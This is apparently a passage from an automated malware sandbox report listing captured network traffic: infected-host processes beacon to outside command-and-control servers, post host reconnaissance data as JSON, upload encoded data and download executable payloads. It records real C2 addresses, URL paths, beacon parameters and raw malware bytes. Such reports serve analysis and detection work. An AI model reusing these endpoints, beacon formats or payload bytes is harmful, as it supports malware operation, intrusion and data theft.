00 10 00 00 00 00 00 00 00 00 00 00 00 5f b0 72 00 73 00 00 00 00 a0 72 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 dc b2 c5 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8c b2 c5 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELcg(JILu2`I@9ID@ _rsr r4(@.rsrcrD(@.idata rF(@ 7rH(@wasfhoet@6J(@ygjteyurC@.taggant0"C@
Dec 22, 2024 02:17:02.799901962 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 22, 2024 02:17:02.799940109 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 22, 2024 02:17:02.800086021 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 22, 2024 02:17:02.800122976 CET	896	IN	Data Raw: 33 24 64 bc 6d ad f0 8d b0 d7 57 14 d2 46 23 84 c6 90 23 56 14 af f7 94 13 f2 70 93 ba 25 39 f1 ca 9c 5a 86 fc ec 47 f2 81 68 5f fa 1b 24 27 0f c8 25 02 ba 6a af 93 10 f4 c8 37 4a eb c8 1f 2d bf 36 e9 89 17 46 01 d7 4c 94 b9 4a f2 ae c3 87 ee cf Data Ascii: 3$dmWF##Vp%9ZGh_$'%j7J-6FLJS\wH6tE:jeiG*oZn#FHmqGg}^O=+DOP;+r;[(h?;hRqa6x.Ok>t>[zv2lsO^on'
Dec 22, 2024 02:17:02.800158978 CET	1236	IN	Data Raw: dd ec c0 47 fe 9e a6 a6 62 a4 23 10 0d fc 97 5a cc ad 42 d0 4e a6 7f 01 57 ac eb 49 30 c0 50 69 e6 d8 c9 5f f7 5f 9b 98 d8 ee 80 c4 e7 14 8e dc 64 cf e8 72 92 74 d3 24 94 7d c8 01 c6 4e 93 de de a0 7d 73 d2 7c 7c 31 32 30 62 1d 35 af 25 f8 5f e4 Data Ascii: Gb#ZBNWI0Pi__drt$}N}s\|\|120b5%_CfrG[G$6?p*E^B$J}`Ww2"0F_VOWK5\|^bRTl6+F9PN1QS1Y#l@0OrlY_{K3;`O0p`WkO7qX
Dec 22, 2024 02:17:02.800194025 CET	1236	IN	Data Raw: 61 3f fc 7d 36 ab ba 17 ee 39 8a 7f dd 0e 09 39 00 a9 92 ef 91 af e9 65 97 4e ef 97 d9 f9 40 60 86 d4 7b 2d f2 0c 51 ca 8f 54 ff 11 39 a4 d2 09 1f 81 c0 51 50 0e 14 e7 b1 e0 41 06 d7 32 85 22 ca dc d2 55 af 2e 5e 56 63 80 ac ab 11 58 ea e5 ed 27 Data Ascii: a?}699eN@`{-QT9QPA2"U.^VcX'^B3rF@^Tc~8PP&S'CB00;h ,5ECEOA~UkZ^H9-P$zVfz-45?W(Rfwt^1uPa~^W?
Dec 22, 2024 02:17:02.800230026 CET	1236	IN	Data Raw: 9a 9d 10 27 ed 45 b8 e7 33 6d 47 9d d1 be 0a 3b 4a ac 3f 94 f7 80 d5 a6 10 2d 70 9d 45 c9 47 57 e2 38 35 28 1d 5f 45 9d 41 5a e2 ee a5 0b fb 02 63 fc 7b a1 73 63 d4 e1 84 56 fc fd b3 ee 50 9d 12 83 87 98 39 38 3b 49 e2 bb a8 7e 25 50 38 bd 31 1b Data Ascii: 'E3mG;J?-pEGW85(_EAZc{scVP98;I~%P81< k{NR5<4CO_pXx<{XpTr.jWu/"Po%#}?";&*Gn)KsSm4$q{'{"EIY"'"Fp\|gU\;'
Dec 22, 2024 02:17:02.800632954 CET	1236	IN	Data Raw: 17 5e 83 f1 c3 d4 5b 57 0f b0 02 fe 89 ba 60 c5 a8 5e d0 d7 3f ac 87 f5 46 fe fa 98 1d 2b 4a eb d4 e8 43 62 dd 13 83 57 fb e7 bb d7 af 4e 62 17 37 42 93 a5 56 26 b1 73 7d 1a b3 58 ce cd 26 d4 29 25 7b ac b5 bc 21 64 76 f2 52 ea d8 3f 98 64 cb 20 Data Ascii: ^[W`^?F+JCbWNb7BV&s}X&)%{!dvR?d G5fMUp7\{dnr3TqOFobd3^KNA'/W3p,#8h{\|C<CMLs'tnN,\W7NSUws;;WZ[
Dec 22, 2024 02:17:02.800668955 CET	1236	IN	Data Raw: 54 12 2c c5 d9 20 48 3f f5 51 f8 7b d4 85 fa 3d d7 7c bd 2e 9b 64 97 d2 42 07 86 15 57 94 8c e7 a2 0d e0 40 3b 77 cd e5 20 58 ef 01 58 ef a4 22 97 17 a6 39 96 84 9f 4c d9 e2 6f 54 5a 1d ae 49 f4 a1 01 f9 51 2f f6 90 36 1a 20 8d 40 9b 8b e3 4f 25 Data Ascii: T, H?Q{=\|.dBW@;w XX"9LoTZIQ/6 @O%w]2YM\pL/8R3Ncna1I@BCgPS9@]KWQ9.qj"E'1SY"Iz]Ps 'rvR6-
Dec 22, 2024 02:17:02.919800997 CET	1236	IN	Data Raw: 22 46 29 e9 72 eb 4a f4 9d 96 1c cc 8d fe a1 41 fb 88 38 34 31 27 ce f2 7a 6e f9 eb fa d3 68 c9 f6 ea 7b ca a6 9b 7e 2a cd a4 32 1b 72 d1 53 d1 b1 40 83 cf 80 a4 7f 8c da 2e e0 78 9a 83 0e 51 52 aa 6d f7 f2 32 14 d9 ef 7c ab c7 2b af 5a 1b e5 ef Data Ascii: "F)rJA841'znh{~2rS@.xQRm2\|+Z_tUXx@`&5xh=HF6:\uENF%>3wTHWO78RO C~5I'6HUxwcRuh}EUN[

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49919	212.193.31.8	80	5172	C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:17:03.295223951 CET	160	OUT	POST /3ofn3jf3e2ljk2/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 212.193.31.8 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 22, 2024 02:17:04.581288099 CET	155	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:17:04 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49925	212.193.31.8	80	5172	C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:17:06.508235931 CET	312	OUT	POST /3ofn3jf3e2ljk2/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 212.193.31.8 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
Dec 22, 2024 02:17:07.846683025 CET	154	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:17:07 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49930	185.121.15.192	80	2648	C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:17:07.739700079 CET	12360	OUT	POST /niCGMfnfOxUBXxpLhBBB1734796753 HTTP/1.1 Host: home.fivetk5sb.top Accept: / Content-Type: application/json Content-Length: 467287 Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 36 36 35 38 38 33 30 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED] Data Ascii: { "ip": "8.46.123.189", "current_time": "8532915458316658830", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 920 }, { "name": "dwm.exe", "pid": 988 }, { "name": "svchost.exe", "pid": 364 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 696 }, { "name": "svchost.exe" [TRUNCATED]
Dec 22, 2024 02:17:07.859337091 CET	4944	OUT	Data Raw: 64 59 57 56 70 6a 5a 47 56 6d 5a 32 68 70 61 6e 4e 30 64 58 5a 33 65 48 6c 36 67 6f 4f 45 68 59 61 48 69 49 6d 4b 6b 70 4f 55 6c 5a 61 58 6d 4a 6d 61 6f 71 4f 6b 70 61 61 6e 71 4b 6d 71 73 72 4f 30 74 62 61 33 75 4c 6d 36 77 73 50 45 78 63 62 48 Data Ascii: dYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6\/9oADAMBAAIRAxEAPwDh6Kc\/3j+H8hTa\/wCiT2nl+P8AwD\/lPCivXvCnwQ8e+KtE0\/xX9l0\/w74O1S4uraw8VeJr9NP029exne1vW0uwt477xHrsVnd
Dec 22, 2024 02:17:07.859438896 CET	4944	OUT	Data Raw: 4a 5c 2f 77 41 74 55 6b 5c 2f 66 77 66 57 36 5c 2f 4c 38 50 30 6f 62 5c 2f 41 46 6b 4c 5c 2f 77 43 75 50 5c 2f 4c 57 54 74 78 5c 2f 6e 39 61 66 47 45 6a 62 66 73 6b 52 4c 6a 39 36 52 5c 2f 71 50 2b 33 58 33 5c 2f 6e 37 39 71 5a 4a 6e 37 67 2b 54 Data Ascii: J\/wAtUk\/fwfW6\/L8P0ob\/AFkL\/wCuP\/LWTtx\/n9afGEjbfskRLj96R\/qP+3X3\/n79qZJn7g+T975X+kdf85\/ya6AGf8tJv4PLi\/5afv5\/8\/8A6vWiT93v\/fS\/u\/3sP+fy9vr0IBtZ\/wDWbPN\/dfuv8\/8A18A9af8A7E3yeZ\/rf3X78df85\/8Ar5AKbbpJXf8A6a+afXr\/AJ\/n60z5\/k3\/ACenm
Dec 22, 2024 02:17:07.859488010 CET	4944	OUT	Data Raw: 39 5c 2f 30 5c 2f 77 44 72 31 48 56 69 69 67 30 4b 39 52 79 64 76 78 71 35 56 65 67 43 76 52 56 69 6d 79 63 5c 2f 50 30 78 5c 2f 54 2b 6f 37 30 48 51 51 30 55 55 55 41 52 62 44 37 66 35 5c 2f 43 6d 56 59 71 76 57 6e 73 5c 2f 50 38 50 2b 43 64 41 Data Ascii: 9\/0\/wDr1HViig0K9Rydvxq5VegCvRVimyc\/P0x\/T+o70HQQ0UUUARbD7f5\/CmVYqvWns\/P8P+CdAVHJ2\/H+lSU1l3Uez8\/w\/wCCBDTdi+n8\/wDGnUUez8\/w\/wCCaU+vy\/UZsHv\/AJ\/Cq7Lu\/l9as7\/3iL\/n1\/8Ar\/8A6qho9n5\/h\/wTQi2H2\/z+FMqxUT9fw\/qaPZ+f4f8ABOgreV7L+X\/1qQr
Dec 22, 2024 02:17:07.859600067 CET	4944	OUT	Data Raw: 57 76 6f 76 39 6f 7a 56 72 4f 35 38 51 36 44 6f 31 74 66 32 56 34 2b 6d 61 64 64 33 4d 34 73 37 71 4b 36 57 47 58 55 4c 70 49 54 48 49 30 4c 4f 49 35 67 75 6e 49 7a 52 53 62 4a 56 56 6f 32 5a 51 72 6f 54 38 36 56 5c 2f 70 66 39 48 6e 42 55 63 4c Data Ascii: Wvov9ozVrO58Q6Do1tf2V4+madd3M4s7qK6WGXULpITHI0LOI5gunIzRSbJVVo2ZQroT86V\/pf9HnBUcL4T8OYilKE\/7VnmWaTnTalGaxGY4mlQkpJvmvhKGGd91t0P8dfpV5jXxvjhxdha0alP+xYZPk0KdRSjOm8LlOErYmDg0uXlx+Jxats\/i3kxmwe\/+fwpj\/eP4fyFTUzu\/wBB\/Kv2w\/n0ioop+w+3+fwoA\/s
Dec 22, 2024 02:17:07.859687090 CET	2472	OUT	Data Raw: 6e 37 6b 2b 64 48 66 35 4a 66 73 5c 2f 77 44 79 31 5c 2f 38 41 4a 72 2b 6e 57 6f 66 6e 58 66 73 54 79 5c 2f 33 66 2b 72 6a 5c 2f 41 4f 57 33 2b 6c 64 5c 2f 30 5c 2f 7a 7a 51 64 42 44 49 32 35 6b 52 4d 76 5c 2f 41 4d 66 47 50 35 66 35 37 5c 2f 6c Data Ascii: n7k+dHf5Jfs\/wDy1\/8AJr+nWofnXfsTy\/3f+rj\/AOW3+ld\/0\/zzQdBDI25kRMv\/AMfGP5f57\/lyzzD9xE3\/ALr+n4\/6djtjuB9JlX5tgyj\/AOf9F+tEmWWZ\/wB3nyvK5\/6+v8npQdBWk5jZ9hTzOB\/Q\/hR8nybIdkf+kf8AP1\/T\/P5U\/wD5aOk\/yekef9b\/AJxUPmP\/ABJc\/wCt83\/W\/uP8\/St
Dec 22, 2024 02:17:07.859710932 CET	2472	OUT	Data Raw: 63 59 43 45 34 53 6e 43 30 55 70 52 62 5c 2f 6f 7a 47 65 50 76 30 71 63 77 34 46 63 73 52 78 39 78 31 5c 2f 71 6a 68 73 66 54 79 61 70 6e 4f 48 70 34 58 42 5a 6e 39 66 78 4f 47 78 47 4a 70 34 4c 45 38 54 59 50 42 59 66 69 69 76 4f 74 68 73 4c 69 Data Ascii: cYCE4SnC0UpRb\/ozGePv0qcw4FcsRx9x1\/qjhsfTyapnOHp4XBZn9fxOGxGJp4LE8TYPBYfiivOthsLiai+sZnUhOFGreTcWj0aSaCb5plRZcYJJLHjOBk5OB6ducc1CbW3f\/AFU+PZ8cf41r+EdD0fxbZeEJ5viv8HfA+rfEv456h+zh8KfCXj3VPila+JfiZ8YLHRfA+tReFfDs\/gr4QeO\/Bui\/2mvxF8Kabp2reP8A
Dec 22, 2024 02:17:07.978888988 CET	2472	OUT	Data Raw: 70 53 6e 54 6c 47 54 5c 2f 6a 48 69 44 68 37 4f 2b 46 73 30 72 5a 4e 78 44 6c 39 66 4b 38 31 6f 55 38 4e 57 72 34 4c 45 75 6d 36 39 47 47 4d 77 39 50 46 55 50 61 71 6e 4f 6f 71 64 53 64 43 74 54 6e 4b 6c 4e 71 72 53 63 75 53 72 43 46 53 4d 6f 49 Data Ascii: pSnTlGT\/jHiDh7O+Fs0rZNxDl9fK81oU8NWr4LEum69GGMw9PFUPaqnOoqdSdCtTnKlNqrScuSrCFSMoIpr\/dP4fzFQXt1HY2d3ezcQ2dtPdSnOP3dvE8r8ngfKh5PSmvJMvxA0f4af2l4QHiPXfgMP2i7KaTXtWTSIPAJ+Al9+0aLfUbpfC8l7b+IR8P9PmhezttNvdMXXnhtF1h9NZ9Xj83iTjPhbhCkq\/E2d4HJaMsJmW
Dec 22, 2024 02:17:07.978990078 CET	2472	OUT	Data Raw: 72 59 33 70 5c 2f 4c 5c 2f 47 6a 59 33 70 5c 2f 4c 5c 2f 47 67 76 6e 66 6c 5c 2f 58 7a 4b 47 48 39 5c 2f 7a 5c 2f 77 44 72 30 76 6c 2b 5c 2f 77 43 6e 5c 2f 77 42 65 72 45 69 76 32 48 30 5c 2f 78 39 5c 2f 62 72 5c 2f 4f 6f 36 44 55 72 30 56 4b 5c Data Ascii: rY3p\/L\/GjY3p\/L\/Ggvnfl\/XzKGH9\/z\/wDr0vl+\/wCn\/wBerEiv2H0\/x9\/br\/Oo6DUr0VK\/T8f6Gmcoe3I\/z6UGntPL8f8AgED9fwplWKi2H2\/z+FB2FSmP0\/H+hqfyn9P0P+FM2P7fl\/8AZUGlPr\/X9f8ADFaipX6fj\/Q1FQaET9fw\/qaZUknb8f6VHQae08vx\/wCARydvx\/pUdWKg2P7fl\/8AZU
Dec 22, 2024 02:17:07.979020119 CET	2472	OUT	Data Raw: 75 6e 70 61 5c 2f 35 39 71 47 62 39 35 5c 2f 64 5c 2f 77 43 32 52 38 2b 62 74 37 5c 2f 51 2b 76 34 55 62 6e 61 4a 30 52 4e 38 6e 5c 2f 4c 58 5c 2f 72 33 39 5c 2f 77 44 50 65 74 50 5a 2b 66 34 66 38 45 32 39 5c 2f 77 44 75 5c 2f 69 48 6c 79 48 72 Data Ascii: unpa\/59qGb95\/d\/wC2R8+bt7\/Q+v4UbnaJ0RN8n\/LX\/r39\/wDPetPZ+f4f8E29\/wDu\/iHlyHr9\/wD56fh\/y946c1D5nyvvfe\/\/ACxkcf6n\/J70EorN5Pl\/9c5P+Ww+v86nxIv9+FP9aI\/N8\/8A0f8ApVe\/\/d\/Eogk\/ec\/8th9ol\/54f8vX4df5fiKZ5eWfyfk\/35fXn\/P+FTfJ5iMnyfu\/+Wn
Dec 22, 2024 02:17:07.979105949 CET	2472	OUT	Data Raw: 34 71 4e 4b 6c 69 4a 72 48 56 63 54 58 72 30 48 68 5a 79 78 45 66 62 51 55 4a 34 72 4d 6e 6a 5c 2f 4d 66 42 48 78 50 38 4d 66 44 7a 77 6c 38 4d 50 43 5c 2f 69 6a 34 77 66 41 33 77 44 5c 2f 77 67 58 37 63 48 78 41 2b 4e 76 78 66 38 46 5c 2f 45 58 Data Ascii: 4qNKliJrHVcTXr0HhZyxEfbQUJ4rMnj\/MfBHxP8MfDzwl8MPC\/ij4wfA3wD\/wgX7cHxA+Nvxf8F\/EX9nHxz8V\/jR49+BHib4Q\/AXwdd6d+yl8YfC\/7Pvjy8+BXxo8RSeCPHfhzRfG\/hH9oL9mHxboOsS+G\/EM3xM0W1sNO1jTflb4Ofta3PwY+BPh\/wr8CvGPjn4UfFLwv\/wAE3v2nPgp8MbN\/DHjSbxH4D+MPj
Dec 22, 2024 02:17:11.385946035 CET	183	IN	HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Sun, 22 Dec 2024 01:17:11 GMT Content-Type: text/html; charset=utf-8 Content-Length: 26 Connection: close Data Raw: 73 71 63 69 6d 31 6e 44 41 61 79 31 74 73 32 7a 31 37 33 34 38 33 30 32 32 39 Data Ascii: sqcim1nDAay1ts2z1734830229

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49935	212.193.31.8	80	5172	C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:17:09.679073095 CET	160	OUT	POST /3ofn3jf3e2ljk2/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 212.193.31.8 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 22, 2024 02:17:10.964806080 CET	155	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:17:10 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49942	185.215.113.43	80	2472	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:17:12.493330956 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 39 38 30 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019806001&unit=246122658369
Dec 22, 2024 02:17:13.856846094 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 22 Dec 2024 01:17:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49944	185.121.15.192	80	2648	C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:17:12.544564009 CET	123	OUT	GET /niCGMfnfOxUBXxpLhBBB1734796753?argument=sqcim1nDAay1ts2z1734830229 HTTP/1.1 Host: home.fivetk5sb.top Accept: /
Dec 22, 2024 02:17:14.116962910 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Sun, 22 Dec 2024 01:17:13 GMT Content-Type: application/octet-stream Content-Length: 10816560 Connection: close Content-Disposition: attachment; filename="6434GUfXCQCleVKhynOXG;" Last-Modified: Sat, 21 Dec 2024 15:59:13 GMT Cache-Control: no-cache ETag: "1734796753.6408284-10816560-3826063559" Data Raw: b1 e5 ff 77 ff d9 b6 70 b5 41 7b 0f 61 45 db 3e e5 b3 af e7 0a 4f 90 f9 e0 e9 39 f2 66 4a 90 57 2a c8 18 01 6b 3d 71 4f 32 cf e0 c2 8e 2a 34 67 01 1e cc 58 e5 9b 71 ae f8 39 37 ed 6d b0 d5 cc a3 31 18 c5 36 b2 9a 4d 79 76 d3 a0 8e 4f 64 71 6a 71 86 ec 4a ec c7 de 1d f9 7a bf 26 bd 39 37 4b b2 cd 72 8b df 49 46 b3 82 5a 08 c3 9c d1 2c 67 b6 fd 62 fc ca 63 9b 29 71 28 a0 2c 12 76 61 f1 b6 b2 07 e3 7a 34 6c 89 2e 6e 58 de 02 6e b6 6f fa 81 dd d6 c1 94 0f 10 a1 d1 92 e0 94 07 fd fe 08 de 2b 01 29 a7 78 98 d1 50 2b 13 37 bc 7d b3 91 0d 51 d7 50 19 3f 45 0f a2 80 8b 8b f2 7f 4f a5 11 73 33 0e 09 31 f0 06 4e 60 33 90 c1 0f 78 19 07 66 0d f7 1b 0a 55 f2 3a a7 1d 04 9e 87 6e 14 2b f2 b9 47 33 17 4c 96 ea 93 90 95 e4 1c 35 9a 0a ae f1 d5 af 96 99 76 92 37 96 ba 96 29 e7 2b d9 66 b2 14 15 40 93 f4 1c 9a fc 71 20 ec 0d 5e 1e ba 2b fb c0 87 ff 87 19 c2 84 84 ba aa ae 63 25 4b 99 1d 8a 7f b3 5d bf 4b 25 b2 f7 f1 ea 23 60 44 7f cc 49 f1 cc ea 48 c1 02 11 63 76 cd f8 2c 20 c9 85 05 5e 0a d7 4d 38 54 0d e8 dd 2b dd [TRUNCATED] Data Ascii: wpA{aE>O9fJWk=qO24gXq97m16MyvOdqjqJz&97KrIFZ,gbc)q(,vaz4l.nXno+)xP+7}QP?EOs31N`3xfU:n+G3L5v7)+f@q ^+c%K]K%#`DIHcv, ^M8T+jF-^z;hm\Z}HP/2T2:ySZ,Bjg-RPYgw5f>>Et?:aKgMVF%vXQ ovFrgAjK''}TQ^gLR+=@Kp~FL`atjnT4{[NLoFUhvh7z0L]w5kAdqZ~D7=i9_Gjgevym{9'% '\Ph{l'@'Hx7`@aa(Vx~U`!mol$\|uJU;a1<{rc`:^wvY8#X2<{K{Zw\|vm[vI8{9M{=v^El&amya`p5;4
Dec 22, 2024 02:17:14.117147923 CET	1236	IN	Data Raw: 4b b7 48 75 f9 49 ea e6 b2 94 9d 73 20 f9 01 78 02 62 73 6d cd a2 b0 ab 60 b7 6c 6a 5e 85 58 4b 8f 12 88 1b 6d e5 56 62 e8 9a b4 fb c5 08 71 03 e8 06 c5 13 11 09 6e ab c7 07 3f 21 43 ed f2 81 4f 75 b0 c3 da bd 1d 09 a9 b4 f9 de b7 bb 2f f8 b2 0d Data Ascii: KHuIs xbsm`lj^XKmVbqn?!COu/m:T8Ll?K-]RnoSI%e`0mcA.9K@=&O!vUmv5x2qC9H"/&[xeWM#iH4Ml.oCRa1g{pd9s
Dec 22, 2024 02:17:14.117186069 CET	1236	IN	Data Raw: 04 2c b8 c8 c7 2e a7 d3 4b 3f 9f 4b ee 87 b3 5c ab 81 d9 99 18 57 83 89 85 28 80 f9 2c bc 62 98 40 3e 8c c4 ae ec 83 dc 78 3d 04 f2 29 c1 15 30 31 c2 6f 9f e1 fb 77 62 83 47 bc ba d1 68 80 6c ae b5 d0 97 23 93 da 47 2d 25 98 22 0d b8 bb a9 d6 e3 Data Ascii: ,.K?K\W(,b@>x=)01owbGhl#G-%";X>l8x`QnHeipT}-7 0sKUIPi=;V&&"e_dSKi2dv>rc$BMKm(9]23<W<MfK+jM2nM
Dec 22, 2024 02:17:14.117314100 CET	1236	IN	Data Raw: 36 7d 32 9a a7 21 c0 43 ef fb c0 f3 77 bd 8a 32 4c ab bc 9f 9d d6 d6 01 0e bb ff 3a f5 63 4a 94 8a 91 42 d6 5d 1f 7a f7 5c 65 4e 0f 92 6b e0 fd 16 64 2c ea bb 42 4a 99 1a 22 75 d9 15 14 49 a0 76 6b 55 c1 eb 5c a9 9d 7a 23 e0 28 fc 2e 38 8a 1f 39 Data Ascii: 6}2!Cw2L:cJB]z\eNkd,BJ"uIvkU\z#(.89:`s%%$^*/bwY=ldD_3ra&L!Q,bU"s\;aqAD$cJ/k/[x\T/,#g#V;Vcnag%Vl=%/oLp48Fp-G19~{f
Dec 22, 2024 02:17:14.117486000 CET	1236	IN	Data Raw: 54 cb 99 4e 78 5d 2d aa 22 04 6f b2 72 79 b3 52 10 82 c5 9d 8c 82 d6 8c 26 76 44 24 9e 1d 29 50 23 c5 a5 dc 77 92 b7 b4 91 c8 fd 3c fb 7a fc ba b4 54 0f 90 05 13 81 fe 77 7c 51 18 2f 89 a6 4d 51 c7 8c aa c2 c2 98 96 89 9d ec e7 1e d5 e7 fa a7 d7 Data Ascii: TNx]-"oryR&vD$)P#w<zTw\|Q/MQ*jdZ=[sNGU0$>-he7}@h6Z$JUboJxZmep\|^'>GM(\6zk@e'61ip,$R6!hU#9:L0p
